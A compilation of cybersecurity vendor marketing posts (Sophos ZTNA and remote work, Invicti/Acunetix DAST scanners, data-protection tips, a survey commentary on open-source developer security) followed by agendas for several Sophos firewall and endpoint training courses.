Many companies still exchange information with clients, partners, or other offices using scripts or custom-developed programs. However, it is not recommended to do so as these outdated methods are a threat to your organization’s security.

In regard to security, the first point to note is that the architecture of the FTP scripts used to send information is usually highly vulnerable. In addition, they do not offer enough control over the data, their traceability is lost, and they are not accepted by the main compliance regulations (PCI-DSS, SOX, and others).

We recommend that you stop using scripts and implement a Secure FTP solution that works with secure protocols that guarantee the confidentiality of the information is centrally managed, allows you to have full control and traceability of data movements for audits and compliance with regulations, automates processes, and more.

2. Encrypt Data in Transit and at Rest

Encryption helps the information that is stored and shared to keep its confidentiality (only accessible by those who must access it) and integrity (everything that is encrypted remains complete and unaltered). Furthermore, by encrypting your data, you ensure that even in the event of improper access, the information will not be readable. This is why encryption is essential to protect your data against cybersecurity threats, even more so because it must be used to comply with regulations or standards specific to each industry.

Although there are many encryption software’s, even some free ones like Open PGP Studio, it is necessary to know the different options and choose the right one for your specific case. File transfer software can encrypt data in transit, and digital rights management solutions can control and revoke document access, no matter where the data is located.

Do you need personalized advice on encryption and data security? You can contact an expert to help you analyze your specific case.

3. Use Secure Collaboration Tools Between Employees, Customers, and Partners

On a daily basis, it’s often necessary to share information with business partners and between employees located in remote locations; this situation has additionally increased with the rise of remote work caused by the pandemic.

To protect information, it is key that your company uses secure collaboration tools that are agile to use and allow you to perform key tasks for daily operations.

4. Avoid Common Mistakes When Sending Large Files

Many organizations share large files that are critical to the business and only when transfers get stuck or are “undeliverable” do they realize they have a problem. Or worse yet, employees continue to use unsafe methods, generally free, continuing to avoid the inevitable.

This is a serious error because in those cases the information can be easily compromised as it usually travels without being encrypted, secure protocols are not used, and the organization loses traceability of the data. In addition, if the file does not reach its destination due to its large size, users do not usually receive notifications. And if they do receive them, they must rerun the process again manually, which entails a notable loss of time.

5. Identify Compromised Devices on the Internal Network

Hackers are becoming increasingly dangerous and the advancement of technology seems to be working in their favor. Nowadays any device with an Internet connection can be hacked, from a small personal smartphone, to an MRI machine for institutional use. And thanks to that first step, attackers can breach your security infrastructure and access the corporate network to steal your information. Unfortunately, in 2021 we have seen that cyberattacks of this type have increased, with several multinational companies becoming victims of hacking.

It is essential for your company to identify with certainty compromised devices in the internal network, but that alone is not enough. To properly protect your data, we recommend you have an advanced network traffic inspection threat detection solution.

6. Inspect Your Data Content Using DLP Technology

Even if your company prioritizes access, user permissions, and encrypts the channels for sending information, you may still be exposed to certain sensitive information (such as credit card data, personal data, etc.) or files with ransomware being sent or received for your company. To avoid these situations, it is recommended to use Data Loss Prevention (DLP) technology which inspects the content of the information sent or received in your company, in order to intercept any data or active code that should not be sent.

7. Classify Your Data to Protect It

A very common mistake in all data protection strategies is to treat everyone the same way. Contrary to what may be believed, this complicates the processes and reduces their effectiveness. A salary listing is not the same as a marketing file or an annual sales estimate, so effective data management and protection begins with a good data classification. It must be known what types of data your company has, where it is hosted, and what level of criticality and business value it has in order to determine which ones should be protected, how to do it, and who should have access and control over them.

8. Create and Implement a Cybersecurity Program

If you do not have one in place yet, you should create and implement a cybersecurity program that will help you to not only protect your data, but any company assets that could be compromised by hackers.

A security program essentially establishes what must be done to understand particular assets (information and systems), what must be in place to take care of them, and how to act in case of an attack. It is very important that this program involves all the employees of the organization and is explained to them in a language that everyone can understand (beyond the technical details).

In addition to the specific recommendations that we have already made in the previous points, depending on the industry in which your company operates or the criticality of your information, it may be necessary to perform pen testing of your environment.

9. Try the Data Security Solutions You Want to Implement for Free

In times when budgets have been greatly shortened and resources diminished due to the pandemic, software purchases must be made meticulously. For this reason, we recommend that before deciding on a data security software, you download a free trial version of it that allows you to learn how to use it and analyze if it is the right one for you. You can also request a demo tailored to the needs of your company so that the software provider can help you analyze if it meets the functionalities you are looking for and meet your expectations.

10. Trust in a Comprehensive Cybersecurity Provider

One of the best tips to improve the security of an organization is to use compatible solutions, whose functionalities integrate well with each other. This will avoid headaches for IT teams and ensures that they can be implemented without stopping the business.

The best way to ensure this is by trusting a comprehensive provider of cybersecurity solutions that are capable of offering all the solutions you need according to your specific case. Furthermore, for those companies in Latin America and Spain, we know that it is very important to have a local presence and speak Spanish, without intermediaries.

Source: Boldon James

It’s easy to pinpoint when the global health crisis forever changed the security landscape. All of a sudden, at exactly the same time, the workforces of entire organizations went remote. And so did the technology teams supporting them.

It’s clear that most organizations won’t be returning to office-based working on the same level as before. And just as users are increasingly dispersed, so are the resources they use: on servers in the office; in cloud-based applications like Office 365 or Salesforce; and in private or public cloud environments on Amazon Web Services (AWS) and Microsoft Azure.

IT teams are being tasked to protect what we’re calling “the Anywhere Organization”: where people can work securely from any location, using any device, and accessing resources wherever they’re held.

3 steps to protect the Anywhere Organization

You wouldn’t bolt your front door but leave your back door unlocked and assume that your home is secure. The same goes for cybersecurity. You need to protect all locations, devices, and resources.

Secure connectivity

Whether employees are logging in from home office setups, at a corporate office, visiting a client, or using a hotel Wi-Fi halfway across the globe, they need to be able to connect securely.

VPN is a tried and trusted approach that has enabled users to connect remotely for years. It was a savior at the beginning of the pandemic, allowing organizations to quickly pivot to secure remote working in just days.

Many organizations are starting to want more than VPN was ever designed to deliver. Zero Trust Network Access (ZTNA) is a great alternative to remote access VPN. It enables users to easily connect to corporate resources from any location while also enhancing your security by constantly verifying the user and validating the health and compliance of the device.

Protect all devices

For today’s Anywhere Organization, protection must work on any device or platform your employees may need to use desktops, laptops, mobile devices, Windows, macOS, Linux, Android, Chromebook, and iOS.

The most devastating cyber threats involve human-led attacks, often exploiting legitimate tools and processes such as PowerShell. Hands-on, live hacking enables attackers to bypass security products and protocols by modifying their tactics, techniques, and procedures (TTPs).

Stopping these human-led attacks requires human-led threat hunting. Either look for an EDR (Endpoint Detection and Response) solution that gives you the tools you need to perform threat hunts from the same console used to manage your endpoint protection, or bring in the experts via a Managed Detection and Response service.

Secure all resources

When it comes to securing the Anywhere Organization, it’s essential to protect the data and workloads your people need to use, while simultaneously securing the networks they’re on.

You may be running servers on-premises, consuming cloud-based applications, or hosting resources in private and public cloud environments on AWS, Azure, or GCP. Most likely, you’re doing all of the above. Whatever your unique situation, you need:

• Next-gen server protection for your cloud, on-premises, or hybrid workload environments.
• Powerful gateway protection with a firewall that secures cloud-based and on-premises environments.

Time to make lemonade

An old adage says, “When life gives you lemons, make lemonade.” And that’s pretty much what the corporate enterprise is doing by adopting the Anywhere Organization trend.

It’s proving out that remote working is a win-win for companies and staff alike in terms of greater productivity and reduced operational costs.

Sophos can help you with all three pillars of secure remote working: secure connectivity, protected devices, and secure resources.

Plus we also make life easier for busy (and often remote) IT teams too: all Sophos protection can be managed through our Sophos Central platform. In fact, customers running a Sophos security system consistently report a 50% reduction in IT workload.

To learn more about how Sophos can help you with secure remote working read our solution brief, Securing the Anywhere Organization.

Source: Sophos

Network security has never been enough to keep bad actors from accessing sensitive data because most breaches occur at the application level. Invicti’s dynamic application security testing (DAST) tools provide the automation, visibility, and scale required to effectively secure web applications.

Invicti is an international web application security software company with a mission to make the internet a safer place, and has brought together Netsparker and Acunetix, two brands that identify web vulnerabilities. 

Meet the tools 

Acunetix 

Acunetix is a vulnerability assessment and management solution, designed to be a part of any enterprise environment by providing multiple integrations as well as options to integrate within custom contexts. Acunetix is renowned for its high-performance engine (written in C++) and the very low rate of false positives. It is available for Microsoft Windows, Linux, and macOS operating systems as well as an online (cloud) solution. The scanner uses a web interface and two unique technologies that help you discover more vulnerabilities: AcuMonitor and AcuSensor (it will help you find the vulnerability in the source code). In addition to an Acunetix scan, you can and you should follow up with further manual tests done using command-line and GUI-based penetration testing tools.

Advantages

• An easy to use, multi-user tool focused on SME/SMB
• Built for efficiency & ease of use Well suited for small security teams
• that do not have dedicated application security resources
• Enables flexible integrations, provides a comprehensive API
• Available on Windows, Linux, macOS and in the cloud
  

Netsparker 

Netsparker finds and reports web application vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) on all types of web applications, regardless of the platform and technology they are built with. Netsparker’s unique and dead accurate Proof-Based Scanning Technology does not just report vulnerabilities, it also produces a Proof of Concept to confirm they are not false positives. Freeing you from having to double check the identified vulnerabilities.

Available as a Windows application (Netsparker Desktop) or as a cloud-based solution (Netsparker Cloud), it is the ultimate, enterprise-class web application security solution.

Advantages 

• A Comprehensive multi-team solution geared towards enterprises
• Built to scale
• Ideal for complex and decentralized IT infrastructures
• Can be deployed in the cloud, on-premises, or in any combination
• Helps break down silos between the security and development teams

 Focusing on network security leaves vulnerabilities 

3 out of 4 security breaches occur at the application level but investments in application security continue to pale compared to network security. 

The risks keep growing

The web has gone from 50 million sites in 2005 to over 1.8 billion (and growing) in 2020. Keeping up with this exponential growth and risk is important to protect your organization and customer data.

All applications will be web applications

Businesses worldwide continue moving to the cloud. Analysts predict that by 2025, cloud products will make up more than 50% of the software market. By 2032, this figure may exceed 90%.

What to do? Be safe! 

The best of breed DAST solutions help you to:

• Automate mimicked real-world attacks to identify, prioritize, and validate security vulnerabilities in running applications.

• Eliminate the reliance on time-consuming manual penetration testing and the dependency on bug bounty programs.

• Reduce friction between security and development teams and incorporate security into the development process.

Invicti delivers safety

Based in Austin, Texas, Invicti Security specializes in web application security, serving organizations across the world. Invicti was founded in 2018 by bringing together Netsparker and Acunetix, two brands that identify web vulnerabilities to prevent costly data breaches and other security incidents. Netsparker was the first web application security solution to deliver automatic verification of vulnerabilities with its proprietary Proof-Based Scanning™ technology. This best-in-class web application security solution identifies vulnerabilities from the early stages of application development through production. Known for its ease of use, speed and accuracy, Acunetix is a global web security leader and the first-ever automated web application security scanner.

The branch office of one

Prior to the pandemic, there was already a shift in networking underway, with an increasing percentage of the workforce beginning to work from home – at least part-time. This trend has dramatically accelerated over the last year, with the vast majority of organizations either mandating their employees work from home, or strongly encouraging it.

This has transformed many organizations almost overnight into a highly-distributed model with hundreds, if not thousands, of one-person branch offices. The “branch office of one” has become the new normal for many organizations.

This massive shift has created a similarly massive challenge for many IT organizations, who have been scrambling to implement VPN access for their remote workers. As just one example, utilization of our Sophos Connect VPN client with XG Firewall has shot up over 10x to more than 1.4 Million active clients in recent months.

And while VPN technology has been a savior and has served us well, it was never really designed for this new world. VPN can be difficult to deploy and enroll new staff, it can be challenging for end-users to use and creates unnecessary friction, and it does not provide the kind of granular security that most organizations require.

Gartner’s recent report, Solving the Challenges of Modern Remote Access, also highlights the challenges with VPN: licensing, efficiency, relevancy, and suitability for the task.

Protecting your data

If it wasn’t enough that IT organizations are grappling with this massive shift in remote working, the whole industry has come under siege by bad actors and hackers attempting to take advantage of the current situation with increasing attacks on corporate systems and data. The latest Sophos 2021 Threat Report provides an excellent look at how cybercriminals have upped their game.

With a massive collection of branch offices of one and an ever-increasing need for tighter security that is transparent and frictionless, what are the options?

We’re actively working to get Sophos ZTNA, or zero trust network access, into your hands as fast as possible. To help overcome some of the challenges you’re facing with remote workers, it provides a simpler, better, more secure solution to connect your users to important applications and data.

Zero trust network access

ZTNA is founded on the principle of zero trust and is all about verifying the user. It typically leverages multi-factor authentication to prevent stolen credentials from being a source of compromise, then validates the health and compliance of the device to ensure it’s enrolled, up to date, and properly protected. ZTNA then uses that information to make policy-based decisions to determine access and privilege to important networked applications.

Benefits of ZTNA compared to remote access VPN

While remote access VPN continues to serve us well, ZTNA offers a number of added benefits that make it a much more compelling solution:

• More granular control: ZTNA allows more granular control over who can access certain applications and data, minimizing lateral movement and removing implied trust. VPN is all-or-nothing: once on the network, VPN generally offers access to everything.
• Better security: ZTNA includes device and health status in access policies to further enhance security. VPN does not consider device status, which can put application data at risk to a compromised or non-compliant device.
• Easier to enroll staff: ZTNA is much easier to roll out and is better when it comes to enrolling new employees. VPN involves more challenging and difficult setup and deployment.
• Transparent to users: ZTNA offers “just works” transparency to users with frictionless connection management. VPN can be difficult and prone to initiating support calls.

Overall, ZTNA offers a welcome solution to connecting the branch office of one.

Sophos ZTNA

Sophos ZTNA is a brand new cloud-delivered, cloud-managed product to easily and transparently secure your important business applications with granular controls.

Sophos ZNTA consists of three components:

• Sophos Central provides the ultimate cloud management and reporting solution for all your Sophos products, including Sophos ZTNA. Sophos ZTNA is fully cloud-enabled, with Sophos Central providing easy deployment, granular policy management, and insightful reporting from the cloud.
• Sophos ZTNA Gateway will be available as a virtual appliance for a variety of platforms to secure networked applications on-premise or in the public cloud. AWS and VMware ESXi support will be available initially, closely followed by support for Azure, Hyper-V, Nutanix, and others.
• Sophos ZTNA Client provides transparent and frictionless connectivity to controlled applications for end users based on identity and device health. It is super easy to deploy from Sophos Central, with an option to deploy alongside Intercept X with just one click or instead work standalone with any desktop AV client. It will initially support MacOS and Windows, and later Linux and mobile device platforms as well.

Coming soon

The early access program (EAP) for the initial version of our ZTNA solution will kick off in the next couple of weeks, so stay tuned for additional news. I hope you will all join us in test-driving Sophos ZTNA to make it the best product it can be for launch!

Source: Sophos

This three-day training program was designed and intended for experienced technical professionals who want to install, configure and support the XG Firewall in production environments and is the result of an in-depth study on the next generation firewall of Sophos. The program consists of presentations and practical workshops for the enhancement of teaching content. Due to the nature of the traditions and the varied experience of the trainees, open discussion is encouraged during the training.

Sophos XG Architect Training (3 days Training) Tuesday 16 March 2021 – Thursday 18 March 2021

Requirement 

• XG Firewall _ Certified Engineer course and delta modules up to version 18.0

Recommended Knowledge

• Knowledge of networking to a CompTIA N+ level
• Knowledge of IT security to a CompTIA S+ level
• Experience configuring network security devices
• Be able to troubleshoot and resolve issues in Windows networked environments
• Experience configuring and administering Linux/UNIX systems

Content

• Module 1: Deployment
• Module 2: Base firewall
• Module 3: Network Protection
• Module 4: Synchronized security
• Module 5: Web server Protection
• Module 6: Site to site connections
• Module 7: Authentications
• Module 8: Web Protection
• Module 9: Wireless
• Module 10: Remote Access
• Module 11: High Availability
• Module 12: Pulic Cloud

Certification

+ exam: Sophos XG Architect

Duration 3 days

Agenda

Trainer: Micheal Eleftheroglou

Day 1 Tuesday 16 March 2021

 9:30-10:45 Module 1: Deployment and Lab

• Recall important information from Engineer courses
• Deployment modes supported by the XG Firewall
• Understand a range of scenarios where each deployment mode would commonly be used
• Use built-in tools to troubleshoot issues
• Labs    
  

10:45-11:00 break

11:00-13:00 Module 2: Base Firewall

• Explain how the XG firewall can be accessed
• Understand the types fo interfaces that can be created
• Understand the benefits of Fast Path Technology
• Configure routing per firewall rule
• Understand best practice for ordering firewall rules
• Explain what Local NAT policy is and known how to configure it.

13:00-14:00 Lunch

14:00-16:00  Labs

• Activate the Sophos XG Firewalls
• Post installation Configuration
• Bridge interfaces
• Create a NAT rule to load balance access to servers
• Create a local NAT policy
• Configure routing using multiple WAN links
• Configure policy-based routing for an MPLS scenario
• Install Sophos Central

16:00-16:15 Break

 16:15-17:15  Module 3:Network Protection and Lab

• Explain what IPS is and how traffic can be offloaded to Fastpath
• Demonstrate how to optimize workload y configuring IPS policies
• Examine advanced Intrusion Prevention and optimize policies
• Configure advanced DOS Protection rules
• Demonstrate how the strict policy can be used to protect networks
• Labs- Create Advanced DoS Rules

Day 2  Wednesday 17 March 2021 

9:30-11:00 Module 4: Synchronized Security and Labs

• Explain how Security Heartbeat works
• Configure Synchronized Security
• Deploy Synchronized Security in discover and inline modes
• Understand the advantages and disadvantages of deploying
• Synchronizes Security in different scenarios
• Labs
• Configure source-Based Security
• Hearteat firewall rules
• Destination based Security Heartbeat
• Missing Security Heartbeat
• Lateral Movement Protection

11:00-11:15 Break

11:15-13:45 Module 5 Webserver Protection and Labs

• Explain how Websever Protection works
• Describe protection features for a web application
• Configure Web Server authentication
• Publish a web service using the Web Application Firewall
• Use the preconfigured templates to configure Web Server Protection for common purposes
• Configure SlowHTTP protection
• Labs (Web Application Firewall)
• Labs (Load balancing with Web Server Protection)
• Labs (Web Server Authentication and path-specific routing)

13:45-14:45 Break and Lunch

14:45-17:45 Module 6: Site to site connections and Labs

• Configure and deploy site to site VPNs in a wide range of environment
• Implement IPsec NATing and failover
• Check and modify route precedence
• Create RED tunnels between XG firewalls
• Understand when to use RED
• Labs ( Create an IPsec site to site VPN
• Labs ( Configure VPN network NATing )
• Labs (Configure VPN failover)
• Labs (Enable RED on the XG firewall)
• Labs (Create a RED tunnel between two XG Firewalls
• Labs (Configure routing for the RED tunnel)
• Labs (Configure route-based VPN)

Day 3 Thursday 18 March  2021

 9:00-10:00 Module 7: Authentications and Labs

• Demonstrate how to configure and use RADIUS accounting
• Deploy STAS in large and complex environment
• Configure SATC and STAS together
• Configure Secure LDAP and identify the different secure connections available
• Labs (configure an Active Directory Authentication server)
• Labs (configure single sing-on using STAS
• Labs (Authenticate users over a site to site VPN)

10:00-11:15  Module 8: Web Protection

• Choose the most appropriate type for web protection in different deployment scenarios
• Enable web filtering using the DPI engine or legacy web proxy
• Configure TLS inspection using the DLP engine or legacy web proxy
• Labs (Install the SSL CA certificate)
• Labs (Configure TLS inspection rules)
• Labs (Create a custom web policy for users)

11:15-11:30 Break

11:30-12:15 Module 9: Wireless

• Explain how Sophos Access Points are deployed and identify some common issues
• Configure RADIUS authentication
• Configure a mesh network

12:15-13:05 Module 10:Remote Access

• Configure Sophos Connect and manage the configuration using Sophos Connect Admin
• Configure an IPsec remote access VPN
• Configure an L2TP remote access VPN for mobile devices
• Labs (Sophos Connect)

13:05-14:25 Module 11: High Availability

• Explain what HA is and how it operates
• Demonstrate how to configure HA and explain the difference between quick and manual configuration
• List the prerequisites for high availability
• Perform troubleshooting steps andc heck the logs to ensure that HA is set up correctly.
• Explain the packet flow in high availability
• Demonstrate how to disable HA
• Labs (Create an Active-Passive cluster)
• Labs (Disable High Availability)

14:25-15:05 Break – Lunch 

15:05-16-15 Public Cloud and Labs

• Deploy XG firewall in complex network enviroments
• Explain how XG firewall process traffic and use this information to inform the configuration
• Configure advanced networking and protection features
• Deploy XG firewall on public cloud infrastructure
• Labs (Put a service in debug mode to gather logs)
• Labs (Retrieving log files)
• Labs (Troubleshoot an issue from an imported configuration file)
• Labs (Deploy an XG Firewall on Azure (simulation)

16:15  (Exams)

The Linux Foundation and the Laboratory for Innovation Science at Harvard recently released a Report on the 2020 Free/Open-Source Software Contributor Survey. One of the primary conclusions of this report was the fact that free/open-source software developers often have a very negative approach to security. They spend very little time resolving security issues (an average of 2.27% of their total time spent) and they express no willingness to spend more.

Some of the quotes from the survey were simply disturbing. For example, “I find the enterprise of security a soul-withering chore and a subject best left for the lawyers and process freaks. I am an application developer.” Another example: “I find security an insufferably boring procedural hindrance.”

While the report contains the authors’ strategic recommendations, here are our thoughts about what this situation means for application security and what you can do about it.

How Far and How Wide?

The original report focuses only on free/open-source software (FOSS) but we believe it is important to consider whether this is only a FOSS problem or a problem with all developers.

Based on the survey, most FOSS developers (74.87%) are employed full-time and more than half (51.65%) are specifically paid to develop FOSS. This means that FOSS is often developed by the same people that develop commercial software. We do not believe that the developers change attitude depending on whether the software they work with is free or commercial. Therefore, we believe that this bad attitude towards security extends to all developers.

We also believe that the underlying cause of this attitude is the fact that developers are either taught badly or not taught at all. Most online resources that teach programming completely skip the issue of secure coding practices. Books about programming languages rarely even mention secure coding. Schools also often treat security as an optional subject instead of a core course that should be a prerequisite to all other programming classes.

Therefore, we conclude that the results of this survey may be assumed to apply to all software developers. While in the case of commercial software some security measures may be added by the presence of dedicated security teams, “the root is still rotten”.

Secure Development? Not Likely!

While 86.3% of the respondents of the survey received formal development training, only 39.8% stated that they have formal training in developing secure software. This means that half the developers were taught badly.

Another shock comes from the response to the following question: “When developing software, what are your main sources for security best practices?”. It turns out that only 10.73% learned such best practices from formal classes and courses and 15.51% from corporate training. Nearly half the developers use online articles/blogs (46.54%) and forums (50.66%) as their primary source of information on best practices, which again shows the horrid state of education and the lack of resources about secure coding. And while we at Acunetix pride ourselves on filling the gap and being the teachers (thanks to our articles that explain how vulnerabilities work and how to avoid them), we would much rather have developers learn first from sources that are more reliable than a search engine.

Last but not least, survey results prove that free/open-source software is usually released with no security testing at all. While 36.63% use a SAST tool to scan FOSS source code, only 15.87% use a DAST to test applications. This situation is probably better in the case of commercial software because security teams usually introduce SAST/DAST into the SDLC.

Why the Bad Attitude?

If your application developers have a bad attitude towards security, it is not only due to their education. It may also be because of your business organization, which causes them to feel that they’re not involved in security at all.

Developers don’t feel responsible for security primarily due to the existence of dedicated security teams. If security personnel work in separate organizational units, the developers think that security is not their problem and expect the security researchers to take care of it instead.

Developers also don’t feel responsible because in a traditional organization they rarely are expected to fix their own security-related mistakes. A typical developer writes a piece of code, gets a code review from another developer (probably just as clueless about security), and then forgets about it. Later, a security researcher finds a vulnerability and creates a ticket to fix it. This ticket is assigned to the first available developer – usually not the one who originally introduced the vulnerability.

Such an organization promotes the lack of responsibility for security and fuels negative feelings between developers and security teams. They may view one another as “the ones that cause problems” – and this is what you must aim to change first.

Automation as a Solution

Automating the process of finding and reporting security vulnerabilities as early as possible solves this problem. First of all, errors are reported by a piece of software, not a human – therefore there is no other person to blame. Secondly, the error is reported immediately, usually after the first build attempt, and the build fails, so the developer must fix their own mistake right away. And thirdly, every time the developer is forced to fix their own error, they learn a little more about how to write secure code and how important it is.

The only problem that remains is finding software that can be trusted with this task. Unfortunately, limited capabilities of SAST/DAST software have been the cause of many failures in the past and this is why many developers do not want to use a SAST or a DAST tool.

SAST tools point to potential problems but they report quite a few false positives – the developer spends a lot of time researching something that turns out not to be a vulnerability at all. In the end, developers stop trusting the tool and start hating it. On the other hand, DAST tools report fewer false positives but often don’t provide enough information for the developer to be sure where the vulnerability is and what it can lead to.

Acunetix helps solve such problems. The advantage is that, in the case of the most serious vulnerabilities, Acunetix provides proof of the vulnerability. For example, the developer may receive a report that their code exposed sensitive files from the server – including the content of these sensitive files as evidence.

Conclusions

The most worrying conclusion from this article is that most free/open-source software is inherently insecure and if you want to feel safe using it, you need to do regular security testing yourself.

Another worrying conclusion is that people who should be your first line of defense in IT security are not educated about security and have a bad attitude toward it. This is not something that is going to be easy or quick to change.

Long-term strategic resolutions are needed to solve these major problems and simply implementing an automated solution cannot be perceived as a magic wand. However, if you introduce a reliable automated testing solution such as Acunetix into your DevSecOps SDLC at the earliest stage possible, you will ensure that your software is safe and you will teach your own developers that they need to take responsibility for the security of their code.

Source: Acunetix

This course is designed for technical professionals who will be supporting Sophos Central and provides an overview of how to troubleshoot the product.

Sophos Central Technician Training (2 days Training) – Tuesday 2 March 2021– Wednesday 3 March 2021 

The course is expected to take 1 ½ days (10 hours) to complete, of which approximately half will be spent on the practical exercises. 

On completion of this course, trainees will be able to:

• Understand the support tools required to investigate common issues
• Identify common issues when reported
• Perform appropriate troubleshooting steps

Prerequisites 

Prior to taking this course you should:

• Have completed and passed the Sophos Central Certified Engineer course
• This course uses Windows tools and utilities as part of the troubleshooting process. Students should be comfortable working with following:
• Windows Administrator command prompt
• Control Panel settings
• File and folder permissions
• Windows Services (services.msc)
• Registry Editor (regedit.exe)
• Windows Firewall with Advanced Security
• Active Directory Users and Computers
• Active Directory Group Policies.

Certification

To become a Sophos Certified Technician, trainees must take and pass an online assessment. The assessment tests their knowledge of both the presented and practical content. The pass mark for the assessment is 80% and is limited to 3 attempts.

Lab Environment

Each student will be provided with a pre-configured environment which simulates a company network with two sites, a head office and a branch office and contains Windows Servers, a Windows Desktop and three XG Firewalls

Content

• Module 1: Introduction to Troubleshooting Sophos Central
• Module 2: Client Installation
• Module 3: Active Directory Synchronization
• Module 4: Updating
• Module 5: Policies
• Module 6: Infection and Detection
• Module 7: Threat Response

Certification

+ exam: Sophos Central Technician

Duration 1 1/2 days 

Agenda

Trainer: Michael Eleftheroglou

Day 1 Tuesday 2 March 2021 

9:30-10:35 Module 1: Introduction to Troubleshooting Sophos Central

• Troubleshooting process
• Alerts and logins in Sophos Central
• Sophos Tools
• Windows Tools
• Client Log Files
• Labs (40 mins)
• Lab Preparation
• Install Server Protection
• Install and Configure AD Sync
• Deploy an Update Cache and Message Relay
  

10:35-12:40 Module 2: Client Installation

Installation Overview

• Active Directory Group Policy Deployment Failure
• Download Failure
• Competitor Removal Tool
• Package Installation Failure
• Labs (75 mins)
• Troubleshoot CRT Issues
• Uninstall a Deleted Endpoint
• Customize the Competitor Removal Tool
• Troubleshoot Deployment using a Startup Script
• Troubleshoot Failure to Download the Installer
• Troubleshoot Package Installation Failure
  

12:40-13:20 Lunch

13:20-14:30  Module 3: Active Directory Synchronization

• Active Directory Synchronization Overview
• Windows Password Changed
• Central Password Changed
• Unable to Connect
• Users No Longer Being Synced
• erifying Filters
• Labs (45 mins)
• Troubleshoot Synchronization Failure
• Troubleshoot Connection Errors for Synchronization
• Troubleshoot Groups Not Synchronizing
• Troubleshoot a Missing UserIPsec VPN Could Not Be Established (Scenario 2)

14:30-15:45  Module 4: Updating

Updating (30 mins)

• Updating Overview
• Techniques for Troubleshooting
• Disk Space and Permissions Problems
• Name Resolution
• Sophos Central
• Sophos Certified Technician
• Client Firewall
• Network Firewall
• Labs (45 mins)
• Investigate the Current Configuration
• Simulate Failure of the Update Cache Server
• Modify Proxy Settings
• Modify Firewall Settings

15:45-16:00 Break  

16:00-17:05  Module 5:Policies

• Policies Overview
• Management Communication
• Message Relays
• Troubleshooting Connectivity
• Client Deleted from Central
• Labs (45 mins)
• Establish the Current Configuration for Management Communication
• Configure Web Control policies and Global Settings
• Configure Server Groups and Policies

Day 2  Wednesday 3 March 2021 

9:30-10:45 Module 6: Infection and Detection

• Cleanup
• Quarantine
• False positives
• Labs (30 mins)
• Release a File from SafeStore
• View File Information in EndPoint Self Help
• Use the Source of Infection Tool

10:45-12:00 Module 7 Threat Response

• Endpoint Detection and Response
• How to read a threat case
• Search for threats
• Detection scenarios
• How to find help from Sophos.
• Labs (30 mins)
• Generate and Analyze Threat Cases
• Create and View a Forensic Snapshot

This course is designed for technical professionals who will be supporting Sophos XG Firewall and provides an overview of how to troubleshoot the product.

Sophos XG Technician Training (2 days Training) – Tuesday 23 February 2021– Wednesday 24 February 2021

The course is expected to take 2 days (16 hours) to complete, of which approximately 4 hours will be spent on the practical exercises.

On completion of this course, trainees will be able to:

• Apply the troubleshooting process to issues
• Use the tools available on the XG Firewall to gather information and investigate issues
• Locate and read log files on the XG Firewall
• Identify and resolve common issues

Prerequisites

Prior to taking this training, you should:

• Have completed and passed the XG Firewall Certified Engineer course and any subsequent delta modules up to version 18.0
• We recommend students have the following knowledge and experience:
• Experience with Windows networking and the ability to troubleshoot issues
• A good understanding of IT security
• Experience configuring network security devices
• Experience configuring and administering Linux/UNIX systems

If you are uncertain whether you meet the necessary prerequisites to take this course, please email us at globaltraining@sophos.com and we will be happy to help.

Certification

To become a Sophos Certified Technician, trainees must take and pass an online assessment. The assessment tests their knowledge of both the presented and practical content. The pass mark for the assessment is 80% and is limited to 3 attempts.

Lab Environment

Each student will be provided with a pre-configured environment that simulates a company network with two sites, a head office and a branch office and contains Windows Servers, a Windows Desktop and three XG Firewalls

Content

• Module 1: Getting Started with Troubleshooting XG Firewall
• Module 2: Troubleshooting Network Protection
• Module 3: Troubleshooting Network Protection II
• Module 4: Troubleshooting Authentication
• Module 5: Troubleshooting Web Protection and Application Control
• Module 6: Troubleshooting Synchronized Security
• Module 7: Troubleshooting Web Server Protection
• Module 8: Troubleshooting Wireless Protection
• Module 9: Troubleshooting Email Protection
• Module 10: Troubleshooting Reporting and How to Get Help

Certification

+ exam: Sophos XG Technician

Duration 2 days 

Agenda

Trainer: Michael Eleftheroglou

Day 1, Tuesday 23 February 2021

9:30-11:25 Module 1: Getting Started with Troubleshooting XG Firewall

• Apply the troubleshooting process to issues
• Resolve common device access issues
• Identify the cause of XG Firewall going into failsafe mode
• Troubleshoot and resolve common high availability issues
• Troubleshoot routing issues
• Labs   
  

11:25-11:40 break 

11:40-13:40 Module 2: Troubleshooting Network Protection

• Troubleshoot and resolve common configuration issues with firewall rules and NAT rules
• Manage TLS decryption errors
• Determine whether traffic is flowing through the FastPath
• Troubleshooting problems with IPS settings
• Manage ATP alerts
• Labs (40 mins)
• Cannot Access Server in New York from London (Scenario 2)
• DNAT Not Working (Scenario 1)
• DNAT Not Working (Scenario 2)
• Remote Desktop Not Working

13:40-14:15 Lunch

14:15-16:00  Module 3: Troubleshooting Network Protection II

• Troubleshoot and resolve common connection issues for IPsec site-to-site VPNs
• Identify and resolve common SSL VPN issues
• Locate the logs for Sophos Connect and modify the configuration file
• Troubleshoot and resolve common issues for Remote Ethernet Devices (RED)
• Labs (30 mins)
• IPsec VPN Could Not Be Established (Scenario 1)
• IPsec VPN Could Not Be Established (Scenario 2)
• SSL VPN Could Not Be Established

16:00-16:15 Break  

16:15-17:45  Module 4: Troubleshooting Authentication

• Troubleshoot issues with the captive portal
• Identify and resolve authentication issues
• Work through the authentication flow to troubleshoot and resolve issues
• Resolve issues with tokens being out of sync
• Labs (20 mins)
• User Cannot Authenticate
• User Not Authenticated with STAS

Day 2,  Wednesday 24 February 2021

9:30-11:00 Module 5: Troubleshooting Web Protection and Application Control

• Explain the differences between DPI web scanning and the web proxy, and troubleshoot basic web policy issues
• Enable debug logging for DPI web scanning
• Troubleshoot web proxy performance issues
• Troubleshoot web categorization
• Troubleshoot application control policy issues
• Labs (20 mins)
• Site Incorrectly Blocked for User
• Application Not Working for User

11:00-11:15 Break

11:15-12:45 Module 6 Troubleshooting Synchronized Security

Identify and resolve issues registering XG Firewall with Sophos Central

• Troubleshooting and resolve issues with Security Heartbeat
• Resolve problems with Synchronized User Identity
• Investigate and resolve problems related to lateral movement protection
• Labs (20 mins)
• Cannot Register XG Firewall with Sophos Central
• Endpoint Cannot Establish a Heartbeat with XG Firewall Configure VPN network NATing

12:45-13:30 Break and Lunch

 13:30- 14:40 Module 7: Troubleshooting Web Server Protection

• Perform basic web server protection configuration
• Troubleshoot and resolve static URL hardening errors
• Troubleshoot and resolve static form hardening errors
• Troubleshoot and resolve threat filter rule errors
